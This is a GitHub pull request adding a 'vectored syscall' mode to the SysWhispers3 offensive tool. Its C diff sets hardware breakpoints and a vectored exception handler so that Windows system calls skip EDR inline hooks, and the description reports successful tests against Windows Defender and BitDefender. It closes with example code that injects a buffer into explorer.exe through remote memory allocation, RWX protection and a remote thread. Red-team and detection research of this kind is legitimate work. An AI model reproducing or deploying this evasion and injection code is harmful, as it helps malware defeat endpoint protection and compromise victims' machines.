### PR TITLE
Implementation of Vectored Syscalls

### DIFF
--- a/README.md
+++ b/README.md
@@ -58,7 +58,7 @@ The help shows all the available commands and features of the tool:
 ```
 C:\>python syswhispers.py -h
 
-usage: syswhispers.py [-h] [-p PRESET] [-a {x86,x64}] [-m {embedded,egg_hunter,jumper,jumper_randomized}] [-f FUNCTIONS] -o OUT_FILE [--int2eh] [--wow64] [-v] [-d]
+usage: syswhispers.py [-h] [-p PRESET] [-a {x86,x64}] [-m {embedded,egg_hunter,jumper,jumper_randomized,vectored}] [-f FUNCTIONS] -o OUT_FILE [--int2eh] [--wow64] [-v] [-d]
 
 SysWhispers3 - SysWhispers on steroids
 
@@ -70,7 +70,7 @@ optional arguments:
                         Architecture
   -c {msvc,mingw,all}, --compiler {msvc,mingw,all}
                         Compiler
-  -m {embedded,egg_hunter,jumper,jumper_randomized}, --method {embedded,egg_hunter,jumper,jumper_randomized}
+  -m {embedded,egg_hunter,jumper,jumper_randomized,vectored}, --method {embedded,egg_hunter,jumper,jumper_randomized,vectored}
                         Syscall recovery method
   -f FUNCTIONS, --functions FUNCTIONS
                         Comma-separated functions

--- a/data/base.c
+++ b/data/base.c
@@ -120,12 +120,7 @@ BOOL SW3_Init()
 }
 #endif
 
-#ifndef JUMPER
-PVOID SC_Address(PVOID NtApiAddress)
-{
-    return NULL;
-}
-#else
+#if defined(JUMPER) || defined(VECTORED)
 PVOID SC_Address(PVOID NtApiAddress)
 {
     DWORD searchLimit = 512;
@@ -203,8 +198,12 @@ PVOID SC_Address(PVOID NtApiAddress)
 
     return NULL;
 }
+#else
+PVOID SC_Address(PVOID NtApiAddress)
+{
+    return NULL;
+}
 #endif
-
 
 BOOL SW3_PopulateSyscallList()
 {

--- a/data/base.c
+++ b/data/base.c
@@ -2,8 +2,8 @@
 #include <stdio.h>
 
 //#define DEBUG
-
 // JUMPER
+// VECTORED
 
 #ifdef _M_IX86
 
@@ -12,6 +12,63 @@ EXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {
 }
 
 // LOCAL_IS_WOW64
+
+#endif
+
+#ifdef VECTORED
+
+static PVOID EXCP_ADDR = NULL;
+static PVOID SYSC_ADDR = NULL;
+static DWORD SSN = 0x0;
+static HANDLE mutex = NULL;
+
+//From: https://gist.github.com/CCob/fe3b63d80890fafeca982f76c8a3efdf
+unsigned long long SetBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) 
+{
+	unsigned long long mask = (1UL << bits) - 1UL;
+	dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);
+	return dw;
+}
+
+void UpdateAddresses(PVOID excpAddr, PVOID syscAddr, DWORD ssn)
+{
+    WaitForSingleObject(mutex, INFINITE);
+    EXCP_ADDR = excpAddr;
+    SYSC_ADDR = syscAddr;
+    SSN = ssn;
+    ReleaseMutex(mutex);
+}
+
+void EnableBreakpoint(CONTEXT* ctx, PVOID address) {
+	ctx->Dr0 = (ULONG_PTR)address;
+	ctx->Dr7 = SetBits(ctx->Dr7, 16, 16, 0);
+	ctx->Dr7 = SetBits(ctx->Dr7, 0, 1, 1);
+	ctx->Dr6 = 0;
+}
+
+void ClearBreakpoint(CONTEXT* ctx) 
+{
+	ctx->Dr0 = 0;	
+	ctx->Dr7 = SetBits(ctx->Dr7, 0, 1, 0);
+	ctx->Dr6 = 0;
+	ctx->EFlags = 0;
+}
+
+LONG WINAPI ExceptionHandler(PEXCEPTION_POINTERS exceptions) 
+{
+	if (exceptions->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP &&
+		exceptions->ExceptionRecord->ExceptionAddress == EXCP_ADDR) 
+	{
+        WaitForSingleObject(mutex, INFINITE);
+        exceptions->ContextRecord->R10 = exceptions->ContextRecord->Rcx;
+        exceptions->ContextRecord->Rax = SSN;
+        exceptions->ContextRecord->Rip = (DWORD64) SYSC_ADDR;
+		ReleaseMutex(mutex);
+        ClearBreakpoint(exceptions->ContextRecord);        
+		return EXCEPTION_CONTINUE_EXECUTION;
+	}
+	return EXCEPTION_CONTINUE_SEARCH;
+}
 
 #endif
 
@@ -39,6 +96,29 @@ DWORD SW3_HashSyscall(PCSTR FunctionName)
 
     return Hash;
 }
+
+#ifndef VECTORED
+BOOL SW3_Init()
+{
+    return TRUE;
+}
+#else
+BOOL SW3_Init()
+{
+    static HANDLE hExHandler = NULL;
+
+    if(mutex == NULL)
+        mutex = CreateMutex(NULL, FALSE, NULL);
+
+    if(hExHandler == NULL)
+        hExHandler = AddVectoredExceptionHandler(1, ExceptionHandler);
+
+    if(hExHandler == NULL)
+        return FALSE;
+
+    return TRUE;
+}
+#endif
 
 #ifndef JUMPER
 PVOID SC_Address(PVOID NtApiAddress)
@@ -175,12 +255,13 @@ BOOL SW3_PopulateSyscallList()
     {
         PCHAR FunctionName = SW3_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);
 
-        // Is this a system call?
+         // Is this a system call?
         if (*(USHORT*)FunctionName == 0x775a)
         {
             Entries[i].Hash = SW3_HashSyscall(FunctionName);
             Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];
-            Entries[i].SyscallAddress = SC_Address(SW3_RVA2VA(PVOID, DllBase, Entries[i].Address));
+            Entries[i].pAddress = SW3_RVA2VA(PVOID, DllBase, Entries[i].Address);
+            Entries[i].SyscallAddress = SC_Address(Entries[i].pAddress);
 
             i++;
             if (i == SW3_MAX_ENTRIES) break;
@@ -202,20 +283,40 @@ BOOL SW3_PopulateSyscallList()
 
                 TempEntry.Hash = Entries[j].Hash;
                 TempEntry.Address = Entries[j].Address;
+                TempEntry.pAddress = Entries[j].pAddress;
                 TempEntry.SyscallAddress = Entries[j].SyscallAddress;
 
                 Entries[j].Hash = Entries[j + 1].Hash;
                 Entries[j].Address = Entries[j + 1].Address;
+                Entries[j].pAddress = Entries[j + 1].pAddress;
                 Entries[j].SyscallAddress = Entries[j + 1].SyscallAddress;
 
                 Entries[j + 1].Hash = TempEntry.Hash;
                 Entries[j + 1].Address = TempEntry.Address;
+                Entries[j + 1].pAddress = TempEntry.pAddress;
                 Entries[j + 1].SyscallAddress = TempEntry.SyscallAddress;
+                
             }
         }
     }
 
     return TRUE;
+}
+
+PVOID SW3_GetFunctionAddress(DWORD FunctionHash)
+{
+        // Ensure SW3_SyscallList is populated.
+    if (!SW3_PopulateSyscallList()) return NULL;
+
+    for (DWORD i = 0; i < SW3_SyscallList.Count; i++)
+    {
+        if (FunctionHash == SW3_SyscallList.Entries[i].Hash)
+        {
+            return SW3_SyscallList.Entries[i].pAddress;
+        }
+    }
+
+    return NULL;
 }
 
 EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)

--- a/data/base.h
+++ b/data/base.h
@@ -24,9 +24,10 @@ typedef NTSTATUS* PNTSTATUS;
 
 typedef struct _SW3_SYSCALL_ENTRY
 {
-    DWORD Hash;
-    DWORD Address;
-	PVOID SyscallAddress;
+    DWORD 	Hash;
+    DWORD	Address;
+	PVOID	pAddress;
+	PVOID 	SyscallAddress;
 } SW3_SYSCALL_ENTRY, *PSW3_SYSCALL_ENTRY;
 
 typedef struct _SW3_SYSCALL_LIST
@@ -56,8 +57,12 @@ typedef struct _SW3_PEB {
 	PSW3_PEB_LDR_DATA Ldr;
 } SW3_PEB, *PSW3_PEB;
 
+BOOL SW3_Init();
 DWORD SW3_HashSyscall(PCSTR FunctionName);
 BOOL SW3_PopulateSyscallList();
+PVOID SW3_GetFunctionAddress(DWORD FunctionHash);
 EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash);
 EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash);
 EXTERN_C PVOID internal_cleancall_wow64_gate(VOID);
+
+


### PR DESCRIPTION
The objective of this pull request is to enhance the functionality of SysWhisper by introducing a new operating mode. The new feature, entitled "Vectored", is based on the concept of performing system calls by leveraging the VEH structure.

Some references:
[https://cyberwarfare.live/bypassing-av-edr-hooks-via-vectored-syscall-poc/](https://cyberwarfare.live/bypassing-av-edr-hooks-via-vectored-syscall-poc/)
[https://redops.at/en/blog/syscalls-via-vectored-exception-handling](https://redops.at/en/blog/syscalls-via-vectored-exception-handling)
[https://winslow1984.com/books/malware/page/mutationgate](https://winslow1984.com/books/malware/page/mutationgate)

Some Related Projects:
[MutationGate](https://github.com/senzee1984/MutationGate) by @senzee1984
[HWSyscalls](https://github.com/Dec0ne/HWSyscalls) by Dec0ne
[TamperingSyscalls](https://github.com/rad9800/TamperingSyscalls) by rad9800
[VEH-PoC](https://github.com/RedTeamOperations/VEH-PoC) by RedTeamOperations

## How it works

A new initialization function, `SW3_Init()`, takes care of registering a custom Exception Handler: `ExceptionHandler`. Thus, every time an API is called:
- A hardware breakpoint is inserted at the beginning of the `ntdll.dll` API that is to be invoked (which, in the case of inline hooking, also corresponds with the address of the `jmp` instruction to the EDR DLL);
- The intended API of `ntdll.dll` is invoked;
- The hardware breakpoint interrupts the execution flow and the raised exception is handled by our previously registered exception handler;
- The exception handler takes care of updating the registers by setting the correct SSN value into `EAX` and setting `RIP` to the address of the `syscall` instruction;
- In this way the API is executed bypassing the hooking instructions added by the EDR.

The implementation was tested on 2 Windows 10 x64 systems. The first protected by Windows Defender and the second by BitDefender (free version). Both tests were successful.

Here are some screenshots illustrating what has just been described. The screenshots refer to a test binary whose code is also given at the bottom as an example of using the new feature.

![ida1](https://github.com/user-attachments/assets/ed9b23c1-e0bb-4568-b330-e6942027fb53)

![ida2](https://github.com/user-attachments/assets/0206bdff-66c5-4df1-8a7d-936ec19680ae)

![ida3](https://github.com/user-attachments/assets/b92e6a94-b159-4660-b948-0a1172b130e1)

## Example Usage

```C
int main()
{
	HANDLE hProcess = NULL, hRemoteThread = NULL;
	PVOID pRemoteAddr = NULL;
	DWORD dwTgtProcId, oldProtect;
	SIZE_T bufLen = sizeof(buf), bytesWritten = 0;

	CONTEXT threadContext;
	threadContext.ContextFlags = CONTEXT_ALL;

	if (!SW3_Init())
		return 0;

	dwTgtProcId = FindProcessByName(TEXT("explorer.exe"));
	if (dwTgtProcId == 0)
	{
		print_debug("[-] target process not found\n");
		return 0;
	}
	print_debug("[+] pid: %d\n", dwTgtProcId);

	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwTgtProcId);
	if (hProcess == NULL)
	{
		print_debug("[-] handle not obtained\n");
		goto Exit;
	}
	print_debug("[+] handle obtained\n");

	if (Sw3NtAllocateVirtualMemory(hProcess, &pRemoteAddr, 0, &bufLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE) != 0) {
		print_debug("[-] NtAllocateVirtualMemory failed\n");
		VirtualFreeEx(hProcess, pRemoteAddr, 0, MEM_RELEASE);
		goto Exit;
	}
	print_debug("[+] remote memory allocation succeded: %p\n", pRemoteAddr);

	if (Sw3NtWriteVirtualMemory(hProcess, pRemoteAddr, buf, sizeof(buf), &bytesWritten) != 0) {
		print_debug("[-] NtWriteVirtualMemory failed\n");
		VirtualFreeEx(hProcess, pRemoteAddr, 0, MEM_RELEASE);
		goto Exit;
	}
	print_debug("[+] written %lld bytes\n", bytesWritten);

	if (Sw3NtProtectVirtualMemory(hProcess, &pRemoteAddr, &bufLen, PAGE_EXECUTE_READWRITE, &oldProtect) != 0) {
		print_debug("[-] NtProtectVirtualMemory failed\n");
		VirtualFreeEx(hProcess, pRemoteAddr, 0, MEM_RELEASE);
		goto Exit;
	}
	print_debug("[+] virtual protect\n");

	if (Sw3NtCreateThreadEx(&hRemoteThread, THREAD_ALL_ACCESS, NULL,
		hProcess, pRemoteAddr, NULL, FALSE, 0, 0, 0, NULL) != 0) {
		print_debug("[-] NtCreateThread failed\n");
		VirtualFreeEx(hProcess, pRemoteAddr, 0, MEM_RELEASE);
		goto Exit;
	}
	print_debug("[+] remote thread created\n");

Exit:
	if (hRemoteThread != NULL) CloseHandle(hRemoteThread);
	if (hProcess != NULL) CloseHandle(hProcess);

	return 0;
}
```